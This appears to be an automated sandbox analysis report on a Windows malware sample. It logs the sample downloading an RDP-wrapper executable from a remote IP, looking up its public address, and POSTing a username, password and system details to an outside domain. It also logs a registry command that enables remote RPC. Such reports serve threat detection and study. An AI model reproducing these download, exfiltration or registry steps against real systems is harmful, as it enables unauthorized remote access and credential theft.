                                                                                                                                                      Oct 11, 2024 23:07:06.152831078 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.152851105 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.152862072 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.152893066 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.152909994 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.152925968 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.152959108 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.152976036 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.152992010 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.153023005 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.153042078 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.153057098 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.153150082 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.153332949 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.153364897 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.153398037 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.153417110 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.154563904 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.154627085 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.154656887 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.154690981 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.154728889 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.154745102 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.154783010 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.154814005 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.154833078 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.154846907 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.154876947 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.154895067 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.154910088 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.154941082 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.154959917 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.154973030 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.155004025 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.155019045 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.155039072 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.155066967 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.155086040 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.195121050 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.234268904 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.234359980 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.234412909 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.234448910 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.234502077 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.234525919 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.241244078 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.241278887 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.241312981 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.241358042 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.241806030 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.241838932 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.241858959 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.241872072 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.241916895 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.241960049 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.241992950 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242026091 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242063046 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.242074013 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242124081 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.242124081 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242152929 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242199898 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.242202044 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242233992 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242264986 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242275000 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.242296934 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242328882 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242347956 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.242361069 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242393970 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:06.242413044 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:06.288683891 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:43.629339933 CEST4973880192.168.2.4172.67.74.152
                                                                                                                                                      Oct 11, 2024 23:07:43.634392023 CEST8049738172.67.74.152192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:43.634501934 CEST4973880192.168.2.4172.67.74.152
                                                                                                                                                      Oct 11, 2024 23:07:43.634610891 CEST4973880192.168.2.4172.67.74.152
                                                                                                                                                      Oct 11, 2024 23:07:43.639468908 CEST8049738172.67.74.152192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.096548080 CEST8049738172.67.74.152192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.098186016 CEST497393389192.168.2.48.46.123.33
                                                                                                                                                      Oct 11, 2024 23:07:44.103528976 CEST3389497398.46.123.33192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.103833914 CEST497393389192.168.2.48.46.123.33
                                                                                                                                                      Oct 11, 2024 23:07:44.103921890 CEST497393389192.168.2.48.46.123.33
                                                                                                                                                      Oct 11, 2024 23:07:44.106416941 CEST4973880192.168.2.4172.67.74.152
                                                                                                                                                      Oct 11, 2024 23:07:44.111309052 CEST3389497398.46.123.33192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.111407995 CEST497393389192.168.2.48.46.123.33
                                                                                                                                                      Oct 11, 2024 23:07:44.111480951 CEST8049738172.67.74.152192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.209269047 CEST8049738172.67.74.152192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.257533073 CEST4973880192.168.2.4172.67.74.152
                                                                                                                                                      Oct 11, 2024 23:07:44.315470934 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:44.315520048 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.315598011 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:44.376265049 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:44.376292944 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.881001949 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.881084919 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:44.892426968 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:44.892451048 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.892925024 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.945014000 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:44.955846071 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:45.003417969 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:45.060488939 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:45.060751915 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:45.060765028 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:45.516453028 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:45.516632080 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:45.517720938 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:45.517739058 CEST44349740188.114.96.3192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:45.517791033 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:45.517811060 CEST49740443192.168.2.4188.114.96.3
                                                                                                                                                      Oct 11, 2024 23:07:45.537834883 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:45.538167953 CEST4973880192.168.2.4172.67.74.152
                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Oct 11, 2024 23:07:43.615557909 CEST5154953192.168.2.41.1.1.1
                                                                                                                                                      Oct 11, 2024 23:07:43.627274990 CEST53515491.1.1.1192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:44.284523964 CEST5556353192.168.2.41.1.1.1
                                                                                                                                                      Oct 11, 2024 23:07:44.314673901 CEST53555631.1.1.1192.168.2.4
                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                      Oct 11, 2024 23:07:43.615557909 CEST192.168.2.41.1.1.10xb9f8Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 11, 2024 23:07:44.284523964 CEST192.168.2.41.1.1.10x635dStandard query (0)hansgborn.euA (IP address)IN (0x0001)false
                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                      Oct 11, 2024 23:07:43.627274990 CEST1.1.1.1192.168.2.40xb9f8No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 11, 2024 23:07:43.627274990 CEST1.1.1.1192.168.2.40xb9f8No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 11, 2024 23:07:43.627274990 CEST1.1.1.1192.168.2.40xb9f8No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 11, 2024 23:07:44.314673901 CEST1.1.1.1192.168.2.40x635dNo error (0)hansgborn.eu188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 11, 2024 23:07:44.314673901 CEST1.1.1.1192.168.2.40x635dNo error (0)hansgborn.eu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                      • hansgborn.eu
                                                                                                                                                      • 147.45.44.104
                                                                                                                                                      • api.ipify.org
                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.449730147.45.44.104807480C:\Users\user\Desktop\67065b4c84713_Javiles.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Oct 11, 2024 23:07:01.032289982 CEST94OUTGET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1
                                                                                                                                                      Host: 147.45.44.104
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Oct 11, 2024 23:07:01.722157955 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Fri, 11 Oct 2024 21:07:01 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 1785344
                                                                                                                                                      Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Keep-Alive: timeout=120
                                                                                                                                                      ETag: "66f55533-1b3e00"
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED]
                                                                                                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`|@@p@@
                                                                                                                                                      Oct 11, 2024 23:07:01.722183943 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt
                                                                                                                                                      Oct 11, 2024 23:07:01.722198009 CEST1236INData Raw: 8d 40 00 84 10 40 00 01 08 53 6d 61 6c 6c 49 6e 74 02 00 80 ff ff ff 7f 00 00 02 00 8d 40 00 a0 10 40 00 01 07 49 6e 74 65 67 65 72 04 00 00 00 80 ff ff ff 7f 02 00 b8 10 40 00 01 04 42 79 74 65 01 00 00 00 00 ff 00 00 00 02 00 8d 40 00 d0 10 40
                                                                                                                                                      Data Ascii: @@SmallInt@@Integer@Byte@@Word@@Pointer@Cardinal@@Int64@8@UInt64X@Singleh@Extend
                                                                                                                                                      Oct 11, 2024 23:07:01.722212076 CEST1236INData Raw: 1b 40 00 4a 00 fe ff a6 1b 40 00 4d 00 ff ff 07 54 4f 62 6a 65 63 74 26 00 5c 51 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 d0 1b 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 8c 51 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08
                                                                                                                                                      Data Ascii: @J@MTObject&\Q@Create@Self$Q@Free@Self>Q@InitInstance@Self@Instance/Q@CleanupInstance@Self)\P@ClassTypeX@@Self
                                                                                                                                                      Oct 11, 2024 23:07:01.722227097 CEST1236INData Raw: 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 6c 12 40 00 08 00 03 08 d0 1b 40 00 00 00 04 53 65 6c 66 02 00 08 d0 1b 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 e4 10 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00
                                                                                                                                                      Data Ascii: CallExceptionl@@Self@ExceptObject@ExceptAddr1PT@AfterConstruction@Self1TT@BeforeDestruction@Self9XT@Dispatch@SelfMessage?LT@D
                                                                                                                                                      Oct 11, 2024 23:07:01.722242117 CEST1236INData Raw: 67 73 02 00 9c 10 40 00 04 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 9c 10 40 00 08 00 00 00 02 09 4c 6f 63 6b 43 6f 75 6e 74 02 00 e4 10 40 00 0c 00 00 00 02 04 44 61 74 61 02 00 78 1e 40 00 10 00 00 00 02 06 42 6f 75 6e 64 73 02 00
                                                                                                                                                      Data Ascii: gs@ElementSize@LockCount@Datax@Bounds@T@TVarData@VType@Reserved1@Reserved2@Reserved3@VSmallInt@VIntegerT@
                                                                                                                                                      Oct 11, 2024 23:07:01.722255945 CEST1236INData Raw: 25 dc c4 44 00 8b c0 ff 25 d8 c4 44 00 8b c0 ff 25 d4 c4 44 00 8b c0 ff 25 d0 c4 44 00 8b c0 ff 25 cc c4 44 00 8b c0 ff 25 c8 c4 44 00 8b c0 ff 25 c4 c4 44 00 8b c0 ff 25 c0 c4 44 00 8b c0 ff 25 bc c4 44 00 8b c0 ff 25 b8 c4 44 00 8b c0 ff 25 b4
                                                                                                                                                      Data Ascii: %D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%D%|D%xD%tD%p
                                                                                                                                                      Oct 11, 2024 23:07:01.722270966 CEST1236INData Raw: d6 b8 fe ff ff ff d3 c0 21 04 95 44 7a 44 00 75 e0 b8 fe ff ff ff 89 d1 d3 c0 21 05 40 7a 44 00 c3 8b c0 81 ea 30 0b 00 00 c1 ea 08 81 ea ff 03 00 00 19 c9 21 ca 81 c2 ff 03 00 00 8d 0c d5 c4 7a 44 00 8b 51 04 39 ca 89 08 89 50 04 89 02 89 41 04
                                                                                                                                                      Data Ascii: !DzDu!@zD0!zDQ9PAtzDDzD@zD=<zDu8zD@u%H<zD)JHT0g#P0r8zD#P<zD)S
                                                                                                                                                      Oct 11, 2024 23:07:01.722287893 CEST776INData Raw: ff eb ac 56 57 80 3d 4d 70 44 00 00 74 39 b8 00 01 00 00 f0 0f b0 25 34 7a 44 00 74 2a f3 90 80 3d d5 78 44 00 00 75 e6 6a 00 e8 04 f8 ff ff b8 00 01 00 00 f0 0f b0 25 34 7a 44 00 74 09 6a 0a e8 ee f7 ff ff eb c7 0f be 73 01 23 35 40 7a 44 00 74
                                                                                                                                                      Data Ascii: VW=MpDt9%4zDt*=xDuj%4zDtjs#5@zDtp4DzD<zDwVW:9u!DzDu@zD#~`rl{)7JHTUK=<zD9r&58zDK09r))=<zD58z
                                                                                                                                                      Oct 11, 2024 23:07:01.722302914 CEST1236INData Raw: 42 14 8b 4a 04 89 48 04 89 41 14 31 c0 39 53 10 75 03 89 43 0c 88 03 89 d0 8b 52 fc 8a 1d 4d 70 44 00 e9 85 00 00 00 b8 00 01 00 00 f0 0f b0 23 74 94 f3 90 80 3d d5 78 44 00 00 75 ea 51 52 6a 00 e8 e5 f4 ff ff 5a 59 b8 00 01 00 00 f0 0f b0 23 0f
                                                                                                                                                      Data Ascii: BJHA19SuCRMpD#t=xDuQRjZY#oQRjZY%4zDtB=xDuj%4zDt!jVuD3L3u5L3Fu@tPCF\3Y4zD
                                                                                                                                                      Oct 11, 2024 23:07:01.727219105 CEST1236INData Raw: 0a 04 00 73 12 f7 db d9 ee dd 14 13 83 c3 08 78 f8 89 0a dd c0 d9 f7 5b c3 8b c0 8b c8 8b d1 83 ea 04 8b 12 83 e2 f0 03 d1 8b c2 8b d0 83 ea 04 8b 12 83 e2 f0 85 d2 75 02 33 c0 c3 8d 40 00 83 3d 3c 7a 44 00 00 74 1a 8b 15 38 7a 44 00 3b d0 72 10
                                                                                                                                                      Data Ascii: sx[u3@=<zDt8zD;r;8zDs=<zDt8zD3@SV ;BuZ;ZvB+^[BH^[WA_p0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.449738172.67.74.152807480C:\Users\user\Desktop\67065b4c84713_Javiles.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Oct 11, 2024 23:07:43.634610891 CEST63OUTGET / HTTP/1.1
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Oct 11, 2024 23:07:44.096548080 CEST227INHTTP/1.1 200 OK
                                                                                                                                                      Date: Fri, 11 Oct 2024 21:07:44 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 11
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Vary: Origin
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8d11d2484d8180d0-EWR
                                                                                                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                      Data Ascii: 8.46.123.33
                                                                                                                                                      Oct 11, 2024 23:07:44.106416941 CEST39OUTGET / HTTP/1.1
                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                      Oct 11, 2024 23:07:44.209269047 CEST227INHTTP/1.1 200 OK
                                                                                                                                                      Date: Fri, 11 Oct 2024 21:07:44 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 11
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Vary: Origin
                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8d11d2490e2080d0-EWR
                                                                                                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                      Data Ascii: 8.46.123.33


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.449740188.114.96.34437480C:\Users\user\Desktop\67065b4c84713_Javiles.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-11 21:07:44 UTC171OUTPOST /core/receive.php HTTP/1.1
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      Host: hansgborn.eu
                                                                                                                                                      Content-Length: 190
                                                                                                                                                      Expect: 100-continue
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-10-11 21:07:45 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                      2024-10-11 21:07:45 UTC190OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 4a 75 73 74 6f 6e 54 68 6f 6d 70 73 6f 6e 26 70 61 73 73 77 6f 72 64 3d 47 32 79 77 68 34 42 5a 33 30 79 75 26 6f 73 5f 6e 61 6d 65 3d 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 26 70 72 6f 63 65 73 73 6f 72 3d 49 6e 74 65 6c 28 52 29 2b 43 6f 72 65 28 54 4d 29 32 2b 43 50 55 2b 36 36 30 30 2b 25 34 30 2b 32 2e 34 30 2b 47 48 7a 26 63 6f 72 65 73 3d 34 26 67 70 75 3d 50 42 52 4f 54 50 4f 26 67 70 75 5f 6d 65 6d 6f 72 79 3d 31 30 32 34 26 72 61 6d 3d 34 30 39 35 26 64 69 73 6b 5f 73 70 61 63 65 3d 33 38 33
                                                                                                                                                      Data Ascii: ip=8.46.123.33&user=JustonThompson&password=G2ywh4BZ30yu&os_name=Windows+10+Pro&processor=Intel(R)+Core(TM)2+CPU+6600+%40+2.40+GHz&cores=4&gpu=PBROTPO&gpu_memory=1024&ram=4095&disk_space=383
                                                                                                                                                      2024-10-11 21:07:45 UTC635INHTTP/1.1 200 OK
                                                                                                                                                      Date: Fri, 11 Oct 2024 21:07:45 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BmAcIu%2FoKc5UcFSN1rO34pQ1ML2cMuad6exZpE7%2F%2BIXeCk6tY0LVhGkwQ3SeZkA2vYzP2mH3hgYvwglRfiyfqLgw%2FAOape6fexMoxksxn5XAhCijNDXIBligkqkaww%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 8d11d24e5cd5437f-EWR
                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                      0


                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:17:06:59
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Users\user\Desktop\67065b4c84713_Javiles.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\67065b4c84713_Javiles.exe"
                                                                                                                                                      Imagebase:0x480000
                                                                                                                                                      File size:940'032 bytes
                                                                                                                                                      MD5 hash:8BE8E5E57FC2A177C12AC52D6F71157C
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1703967641.0000000000482000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2171643627.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:1
                                                                                                                                                      Start time:17:07:04
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:2
                                                                                                                                                      Start time:17:07:04
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
